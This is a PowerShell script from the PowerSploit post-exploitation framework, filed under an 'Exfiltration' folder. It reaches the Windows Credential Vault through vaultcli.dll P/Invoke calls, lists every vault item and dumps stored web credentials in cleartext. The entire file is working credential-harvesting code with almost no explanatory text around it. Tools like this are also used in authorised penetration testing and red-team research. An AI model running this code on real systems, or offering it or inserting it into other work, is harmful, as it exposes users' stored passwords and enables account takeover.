Exfiltration/Get-VaultCredential.ps1

function Get-VaultCredential
{
<#
.SYNOPSIS

Displays Windows vault credential objects including cleartext web credentials.

PowerSploit Function: Get-VaultCredential
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
 
.DESCRIPTION

Get-VaultCredential enumerates and displays all credentials stored in the Windows
vault. Web credentials, specifically are displayed in cleartext. This script was
inspired by the following C implementation: http://www.oxid.it/downloads/vaultdump.txt

.EXAMPLE

Get-VaultCredential

.NOTES

Only web credentials can be displayed in cleartext.
#>

    [CmdletBinding()] Param()

    $OSVersion = [Environment]::OSVersion.Version
    $OSMajor = $OSVersion.Major
    $OSMinor = $OSVersion.Minor

    #region P/Invoke declarations for vaultcli.dll
    $DynAssembly = New-Object System.Reflection.AssemblyName('VaultUtil')
    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('VaultUtil', $False)

    $EnumBuilder = $ModuleBuilder.DefineEnum('VaultLib.VAULT_ELEMENT_TYPE', 'Public', [Int32])
    $null = $EnumBuilder.DefineLiteral('Undefined', -1)
    $null = $EnumBuilder.DefineLiteral('Boolean', 0)
    $null = $EnumBuilder.DefineLiteral('Short', 1)
    $null = $EnumBuilder.DefineLiteral('UnsignedShort', 2)
    $null = $EnumBuilder.DefineLiteral('Int', 3)
    $null = $EnumBuilder.DefineLiteral('UnsignedInt', 4)
    $null = $EnumBuilder.DefineLiteral('Double', 5)
    $null = $EnumBuilder.DefineLiteral('Guid', 6)
    $null = $EnumBuilder.DefineLiteral('String', 7)
    $null = $EnumBuilder.DefineLiteral('ByteArray', 8)
    $null = $EnumBuilder.DefineLiteral('TimeStamp', 9)
    $null = $EnumBuilder.DefineLiteral('ProtectedArray', 10)
    $null = $EnumBuilder.DefineLiteral('Attribute', 11)
    $null = $EnumBuilder.DefineLiteral('Sid', 12)
    $null = $EnumBuilder.DefineLiteral('Last', 13)
    $VAULT_ELEMENT_TYPE = $EnumBuilder.CreateType()

    $EnumBuilder = $ModuleBuilder.DefineEnum('VaultLib.VAULT_SCHEMA_ELEMENT_ID', 'Public', [Int32])
    $null = $EnumBuilder.DefineLiteral('Illegal', 0)
    $null = $EnumBuilder.DefineLiteral('Resource', 1)
    $null = $EnumBuilder.DefineLiteral('Identity', 2)
    $null = $EnumBuilder.DefineLiteral('Authenticator', 3)
    $null = $EnumBuilder.DefineLiteral('Tag', 4)
    $null = $EnumBuilder.DefineLiteral('PackageSid', 5)
    $null = $EnumBuilder.DefineLiteral('AppStart', 100)
    $null = $EnumBuilder.DefineLiteral('AppEnd', 10000)
    $VAULT_SCHEMA_ELEMENT_ID = $EnumBuilder.CreateType()

    $LayoutConstructor = [Runtime.InteropServices.StructLayoutAttribute].GetConstructor([Runtime.InteropServices.LayoutKind])
    $CharsetField = [Runtime.InteropServices.StructLayoutAttribute].GetField('CharSet')
    $StructLayoutCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($LayoutConstructor,
                                                                                     @([Runtime.InteropServices.LayoutKind]::Explicit),
                                                                                     $CharsetField,
                                                                                     @([Runtime.InteropServices.CharSet]::Ansi))
    $StructAttributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'

    $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.VAULT_ITEM', $StructAttributes, [Object], [System.Reflection.Emit.PackingSize]::Size4)
    $null = $TypeBuilder.DefineField('SchemaId', [Guid], 'Public')
    $null = $TypeBuilder.DefineField('pszCredentialFriendlyName', [IntPtr], 'Public')
    $null = $TypeBuilder.DefineField('pResourceElement', [IntPtr], 'Public')
    $null = $TypeBuilder.DefineField('pIdentityElement', [IntPtr], 'Public')
    $null = $TypeBuilder.DefineField('pAuthenticatorElement', [IntPtr], 'Public')
    if ($OSMajor -ge 6 -and $OSMinor -ge 2)
    {
        $null = $TypeBuilder.DefineField('pPackageSid', [IntPtr], 'Public')
    }
    $null = $TypeBuilder.DefineField('LastModified', [UInt64], 'Public')
    $null = $TypeBuilder.DefineField('dwFlags', [UInt32], 'Public')
    $null = $TypeBuilder.DefineField('dwPropertiesCount', [UInt32], 'Public')
    $null = $TypeBuilder.DefineField('pPropertyElements', [IntPtr], 'Public')
    $VAULT_ITEM = $TypeBuilder.CreateType()

    $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.VAULT_ITEM_ELEMENT', $StructAttributes)
    $TypeBuilder.SetCustomAttribute($StructLayoutCustomAttribute)
    $null = $TypeBuilder.DefineField('SchemaElementId', $VAULT_SCHEMA_ELEMENT_ID, 'Public').SetOffset(0)
    $null = $TypeBuilder.DefineField('Type', $VAULT_ELEMENT_TYPE, 'Public').SetOffset(8)
    $VAULT_ITEM_ELEMENT = $TypeBuilder.CreateType()


    $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.Vaultcli', 'Public, Class')
    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultOpenVault',
                                                      'vaultcli.dll',
                                                      'Public, Static',
                                                      [Reflection.CallingConventions]::Standard,
                                                      [Int32],
                                                      [Type[]] @([Guid].MakeByRefType(),
                                                                 [UInt32],
                                                                 [IntPtr].MakeByRefType()),
                                                      [Runtime.InteropServices.CallingConvention]::Winapi,
                                                      [Runtime.InteropServices.CharSet]::Auto)

    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultCloseVault',
                                                      'vaultcli.dll',
                                                      'Public, Static',
                                                      [Reflection.CallingConventions]::Standard,
                                                      [Int32],
                                                      [Type[]] @([IntPtr].MakeByRefType()),
                                                      [Runtime.InteropServices.CallingConvention]::Winapi,
                                                      [Runtime.InteropServices.CharSet]::Auto)

    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultFree',
                                                      'vaultcli.dll',
                                                      'Public, Static',
                                                      [Reflection.CallingConventions]::Standard,
                                                      [Int32],
                                                      [Type[]] @([IntPtr]),
                                                      [Runtime.InteropServices.CallingConvention]::Winapi,
                                                      [Runtime.InteropServices.CharSet]::Auto)

    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultEnumerateVaults',
                                                      'vaultcli.dll',
                                                      'Public, Static',
                                                      [Reflection.CallingConventions]::Standard,
                                                      [Int32],
                                                      [Type[]] @([Int32],
                                                                 [Int32].MakeByRefType(),
                                                                 [IntPtr].MakeByRefType()),
                                                      [Runtime.InteropServices.CallingConvention]::Winapi,
                                                      [Runtime.InteropServices.CharSet]::Auto)

    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultEnumerateItems',
                                                      'vaultcli.dll',
                                                      'Public, Static',
                                                      [Reflection.CallingConventions]::Standard,
                                                      [Int32],
                                                      [Type[]] @([IntPtr],
                                                                 [Int32],
                                                                 [Int32].MakeByRefType(),
                                                                 [IntPtr].MakeByRefType()),
                                                      [Runtime.InteropServices.CallingConvention]::Winapi,
                                                      [Runtime.InteropServices.CharSet]::Auto)

    if ($OSMajor -ge 6 -and $OSMinor -ge 2)
    {
        $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultGetItem',
                                                          'vaultcli.dll',
                                                          'Public, Static',
                                                          [Reflection.CallingConventions]::Standard,
                                                          [Int32],
                                                          [Type[]] @([IntPtr],
                                                                     [Guid].MakeByRefType(),
                                                                     [IntPtr],
                                                                     [IntPtr],
                                                                     [IntPtr],
                                                                     [IntPtr],
                                                                     [Int32],
                                                                     [IntPtr].MakeByRefType()),
                                                          [Runtime.InteropServices.CallingConvention]::Winapi,
                                                          [Runtime.InteropServices.CharSet]::Auto)
    }
    else
    {
        $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultGetItem',
                                                          'vaultcli.dll',
                                                          'Public, Static',
                                                          [Reflection.CallingConventions]::Standard,
                                                          [Int32],
                                                          [Type[]] @([IntPtr],
                                                                     [Guid].MakeByRefType(),
                                                                     [IntPtr],
                                                                     [IntPtr],
                                                                     [IntPtr],
                                                                     [Int32],
                                                                     [IntPtr].MakeByRefType()),
                                                          [Runtime.InteropServices.CallingConvention]::Winapi,
                                                          [Runtime.InteropServices.CharSet]::Auto)
    }

    $Vaultcli = $TypeBuilder.CreateType()
    #endregion

    # Helper function to extract the ItemValue field from a VAULT_ITEM_ELEMENT struct.
    function local:Get-VaultElementValue
    {
        Param (
            [ValidateScript({$_ -ne [IntPtr]::Zero})]
            [IntPtr]
            $VaultElementPtr
        )

        $PartialElement = [Runtime.InteropServices.Marshal]::PtrToStructure($VaultElementPtr, [Type] $VAULT_ITEM_ELEMENT)
        $ElementPtr = [IntPtr] ($VaultElementPtr.ToInt64() + 16)

        switch ($PartialElement.Type)
        {
            $VAULT_ELEMENT_TYPE::String {
                $StringPtr = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] $ElementPtr)
                [Runtime.InteropServices.Marshal]::PtrToStringUni([IntPtr] $StringPtr)
            }

            $VAULT_ELEMENT_TYPE::Boolean {
                [Bool] [Runtime.InteropServices.Marshal]::ReadByte([IntPtr] $ElementPtr)
            }

            $VAULT_ELEMENT_TYPE::Short {
                [Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] $ElementPtr)
            }

            $VAULT_ELEMENT_TYPE::UnsignedShort {
                [Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] $ElementPtr)
            }

            $VAULT_ELEMENT_TYPE::Int {
                [Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] $ElementPtr)
            }

            $VAULT_ELEMENT_TYPE::UnsignedInt {
                [Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] $ElementPtr)
            }

            $VAULT_ELEMENT_TYPE::Double {
                [Runtime.InteropServices.Marshal]::PtrToStructure($ElementPtr, [Type] [Double])
            }

            $VAULT_ELEMENT_TYPE::Guid {
                [Runtime.InteropServices.Marshal]::PtrToStructure($ElementPtr, [Type] [Guid])
            }

            $VAULT_ELEMENT_TYPE::Sid {
                $SidPtr = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] $ElementPtr)
                Write-Verbose "0x$($SidPtr.ToString('X8'))"
                $SidObject = [Security.Principal.SecurityIdentifier] ([IntPtr] $SidPtr)
                $SidObject.Value
            }

            # These elements are currently unimplemented.
            # I have yet to see these used in practice.
            $VAULT_ELEMENT_TYPE::ByteArray { $null }
            $VAULT_ELEMENT_TYPE::TimeStamp { $null }
            $VAULT_ELEMENT_TYPE::ProtectedArray { $null }
            $VAULT_ELEMENT_TYPE::Attribute { $null }
            $VAULT_ELEMENT_TYPE::Last { $null }
        }
    }

    $VaultCount = 0
    $VaultGuidPtr = [IntPtr]::Zero
    $Result = $Vaultcli::VaultEnumerateVaults(0, [Ref] $VaultCount, [Ref] $VaultGuidPtr)

    if ($Result -ne 0)
    {
        throw "Unable to enumerate vaults. Error (0x$($Result.ToString('X8')))"
    }

    $GuidAddress = $VaultGuidPtr

    $VaultSchema = @{
        ([Guid] '2F1A6504-0641-44CF-8BB5-3612D865F2E5') = 'Windows Secure Note'
        ([Guid] '3CCD5499-87A8-4B10-A215-608888DD3B55') = 'Windows Web Password Credential'
        ([Guid] '154E23D0-C644-4E6F-8CE6-5069272F999F') = 'Windows Credential Picker Protector'
        ([Guid] '4BF4C442-9B8A-41A0-B380-DD4A704DDB28') = 'Web Credentials'
        ([Guid] '77BC582B-F0A6-4E15-4E80-61736B6F3B29') = 'Windows Credentials'
        ([Guid] 'E69D7838-91B5-4FC9-89D5-230D4D4CC2BC') = 'Windows Domain Certificate Credential'
        ([Guid] '3E0E35BE-1B77-43E7-B873-AED901B6275B') = 'Windows Domain Password Credential'
        ([Guid] '3C886FF3-2669-4AA2-A8FB-3F6759A77548') = 'Windows Extended Credential'
        ([Guid] '00000000-0000-0000-0000-000000000000') = $null
    }

    if ($VaultCount)
    {
        foreach ($i in 1..$VaultCount)
        {
            $VaultGuid = [Runtime.InteropServices.Marshal]::PtrToStructure($GuidAddress, [Type] [Guid])
            $GuidAddress = [IntPtr] ($GuidAddress.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] [Guid]))

            $VaultHandle = [IntPtr]::Zero

            Write-Verbose "Opening vault - $($VaultSchema[$VaultGuid]) ($($VaultGuid))"

            $Result = $Vaultcli::VaultOpenVault([Ref] $VaultGuid, 0, [Ref] $VaultHandle)

            if ($Result -ne 0)
            {
                Write-Error "Unable to open the following vault: $($VaultSchema[$VaultGuid]). Error (0x$($Result.ToString('X8')))"
                continue
            }

            $VaultItemCount = 0
            $VaultItemPtr = [IntPtr]::Zero

            $Result = $Vaultcli::VaultEnumerateItems($VaultHandle, 512, [Ref] $VaultItemCount, [Ref] $VaultItemPtr)

            if ($Result -ne 0)
            {
                $null = $Vaultcli::VaultCloseVault([Ref] $VaultHandle)
                Write-Error "Unable to enumerate vault items from the following vault: $($VaultSchema[$VaultGuid]). Error (0x$($Result.ToString('X8')))"
                continue
            }

            $StructAddress = $VaultItemPtr

            if ($VaultItemCount)
            {
                foreach ($j in 1..$VaultItemCount)
                {
                    $CurrentItem = [Runtime.InteropServices.Marshal]::PtrToStructure($StructAddress, [Type] $VAULT_ITEM)
                    $StructAddress = [IntPtr] ($StructAddress.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] $VAULT_ITEM))

                    $PasswordVaultItem = [IntPtr]::Zero

                    if ($OSMajor -ge 6 -and $OSMinor -ge 2)
                    {
                        $Result = $Vaultcli::VaultGetItem($VaultHandle,
                                                          [Ref] $CurrentItem.SchemaId,
                                                          $CurrentItem.pResourceElement,
                                                          $CurrentItem.pIdentityElement,
                                                          $CurrentItem.pPackageSid,
                                                          [IntPtr]::Zero,
                                                          0,
                                                          [Ref] $PasswordVaultItem)
                    }
                    else
                    {
                        $Result = $Vaultcli::VaultGetItem($VaultHandle,
                                                          [Ref] $CurrentItem.SchemaId,
                                                          $CurrentItem.pResourceElement,
                                                          $CurrentItem.pIdentityElement,
                                                          [IntPtr]::Zero,
                                                          0,
                                                          [Ref] $PasswordVaultItem)
                    }

                    $PasswordItem = $null

                    if ($Result -ne 0)
                    {
                        Write-Error "Error occured retrieving vault item. Error (0x$($Result.ToString('X8')))"
                        continue
                    }
                    else
                    {
                        $PasswordItem = [Runtime.InteropServices.Marshal]::PtrToStructure($PasswordVaultItem, [Type] $VAULT_ITEM)
                    }

                    if ($VaultSchema.ContainsKey($VaultGuid))
                    {
                        $VaultType = $VaultSchema[$VaultGuid]
                    }
                    else
                    {
                        $VaultType = $VaultGuid
                    }

                    if ($PasswordItem.pAuthenticatorElement -ne [IntPtr]::Zero)
                    {
                        $Credential = Get-VaultElementValue $PasswordItem.pAuthenticatorElement
                    }
                    else
                    {
                        $Credential = $null
                    }

                    $PackageSid = $null

                    if ($CurrentItem.pPackageSid -and ($CurrentItem.pPackageSid -ne [IntPtr]::Zero))
                    {
                        $PackageSid = Get-VaultElementValue $CurrentItem.pPackageSid
                    }


                    $Properties = @{
                        Vault = $VaultType
                        Resource = if ($CurrentItem.pResourceElement) { Get-VaultElementValue $CurrentItem.pResourceElement } else { $null }
                        Identity = if ($CurrentItem.pIdentityElement) { Get-VaultElementValue $CurrentItem.pIdentityElement } else { $null }
                        PackageSid = $PackageSid
                        Credential = $Credential
                        LastModified = [DateTime]::FromFileTimeUtc($CurrentItem.LastModified)
                    }

                    $VaultItem = New-Object PSObject -Property $Properties
                    $VaultItem.PSObject.TypeNames[0] = 'VAULTCLI.VAULTITEM'

                    $VaultItem

                    $null = $Vaultcli::VaultFree($PasswordVaultItem)
                }
            }

            $null = $Vaultcli::VaultCloseVault([Ref] $VaultHandle)
        }
    }
}